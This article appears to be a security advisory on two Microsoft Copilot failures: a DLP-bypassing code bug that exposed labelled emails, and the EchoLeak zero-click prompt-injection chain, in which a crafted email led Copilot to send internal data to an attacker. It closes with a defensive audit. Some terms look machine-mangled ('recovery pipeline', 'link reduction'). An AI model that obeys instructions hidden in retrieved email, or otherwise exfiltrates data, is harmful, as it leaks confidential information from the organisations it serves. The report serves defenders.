
For four weeks starting on January 21, Microsoft’s Co-Pilot read and summarized confidential emails, despite every sensitivity label and DLP policy requiring it not to do so. The enforcement point broke inside Microsoft’s own pipeline, and no security tools in the stack flagged it. Affected organizations included the UK’s National Health Service, which logged it as INC46740412 – an indication of how far the failure reached into the regulated health care environment. Microsoft tracked it as CW1226324.
The advisory, first reported by BleepingComputer on February 18, is the second time in eight months that Copilot’s recovery pipeline has breached its own trust boundary – a failure in which the AI system accessed or transmitted data it was explicitly prohibited from touching. The first was even worse.
In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed “Echoleak”. A malicious email mentions Copilot’s prompt injection classifier, its link reduction, its content-security-policy, and its ability to quietly exfiltrate enterprise data. No clicks and no user action were required. Microsoft gave it a CVSS score of 9.3.
Two different root causes; A blind spot: A code error and a sophisticated exploit chain produced a similar result. The co-pilot processed the data, was explicitly prohibited from touching it, and nothing was observed in the safety stack.
Why EDR and WAF remain architecturally blind to this
Endpoint Detection and Response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Nor is there a detection category for “your AI assistant has violated its own trust threshold.” This gap exists because the LLM recovery pipeline sits behind an enforcement layer that traditional security tools were never designed to inspect.
Co-Pilot swallowed a labeled email that was asked to be discarded, and the entire action took place inside Microsoft’s infrastructure. Between recovery index and generation models. Nothing dropped to disk, no unusual traffic crossed the perimeter, and no processes occurred to flag the endpoint agent. The security stack reported a completely clean report because it never looked at the layer where the breach occurred.
The CW1226324 bug worked because a code-path error allowed sent items and messages in drafts to enter Copilot’s recovery set despite sensitivity labels and DLP rules that should have blocked them, as per Microsoft’s advice. EchoLeak worked because Aim Security researchers proved that a malicious email, made to look like normal business correspondence, could manipulate Copilot’s recovery-enhanced generation pipeline into accessing and transmitting internal data to an attacker-controlled server.
Researchers at Aim Security describe this as a fundamental design flaw: agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation. That design flaw didn’t disappear when Microsoft patched EchoLeak. CW1226324 proves that the enforcement layer around it can fail independently.
Five-point audit that maps both failure modes
None of the failures generated a single warning. Both were discovered through vendor advisory channels – not through SIEM, not through EDR, not through WAF.
CW1226324 went public on February 18. Affected tenants were exposed starting January 21. Microsoft has not disclosed how many organizations were affected or what data was accessed during that window. For security leaders, that difference is the story: a four-week exposure inside a vendor’s estimation pipeline, invisible to every tool in the stack, discovered only because Microsoft decided to publish an advisory.
1. Test DLP enforcement directly against Copilot. CW1226324 existed for four weeks because no one tested whether Copilot actually respected the sensitivity labels on sent items and drafts. Create labeled test messages in controlled folders, interrogate Copilot and confirm that it cannot surface them. Run this test monthly. There is no configuration enforcement; The only proof is a failed recovery attempt.
2. Block external content from accessing CoPilot’s context window. The echoleak was successful because a malicious email entered Copilot’s recovery set and its injected instructions were executed as if they were a user’s query. According to disclosures by Aim Security, the attack bypassed four different defense layers: Microsoft’s cross-prompt injection classifier, external link reduction, content-security-policy controls, and context mention protection measures. Disable external email context in Copilot settings, and restrict Markdown rendering in AI output. This captures the quick-injection class of failure by completely removing the attack surface.
3. Audit review logs for inconsistent copilot interactions during the January to February exposure window. Look for Copilot chat queries returning content from messages labeled between January 21 and mid-February 2026. None of the failure classes generated alerts through existing EDR or WAF, so preemptive detection relied on preview telemetry. If your tenant cannot reconstruct what the copilot accessed during the exposure window, formally document that difference. It matters for compliance. For any organization under regulatory scrutiny, an unspecified AI data access gap during a known vulnerability window is an audit discovery waiting to happen.
4. Turn on restricted content search for SharePoint sites that contain sensitive data. RCD completely removes sites from Copilot’s recovery pipeline. This works regardless of whether the trust violation comes from a code bug or an injected prompt, because the data never enters the context window in the first place. This is a prevention layer that does not depend on the breakdown enforcement point. For organizations handling sensitive or regulated dataRCD is not optional.
5. Create an incident response playbook for vendor-hosted estimation failures. The incident response (IR) playbook requires a new category: trust boundary violations inside the vendor’s estimation pipeline. Define growth paths. Assign ownership. Establish a monitoring cadence for vendor service health advisories that impact AI processing. Your SIEM won’t even be able to catch the next one.
The pattern that is transferred from the copilot
A 2026 survey by Cybersecurity Insiders found that 47% of CISOs and senior security leaders have already observed AI agents exhibit unexpected or unauthorized behavior. Organizations are deploying AI assistants in production faster than they can build governance around them.
That trajectory matters because this framework is not Copilot-specific. Any RAG-based assistant pulling from enterprise data runs through the same pattern: a retrieval layer selects the content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the recovery layer feeds restricted data into the model, and the security stack never sees it. CoPilot, Gemini for Workspaces, and any device with recovery access to internal documents carries the same structural risks.
Run a five-point audit before your next board meeting. Start with labeled test messages in a controlled folder. If Copilot brings them up, each policy below is theater.
Board response: “Our policies were configured correctly. Enforcement failed inside the vendor’s inference pipeline. Here are five controls we are testing, restricting, and demanding before re-enabling full access for sensitive workloads.”
The next failure will not send an alert.
<a href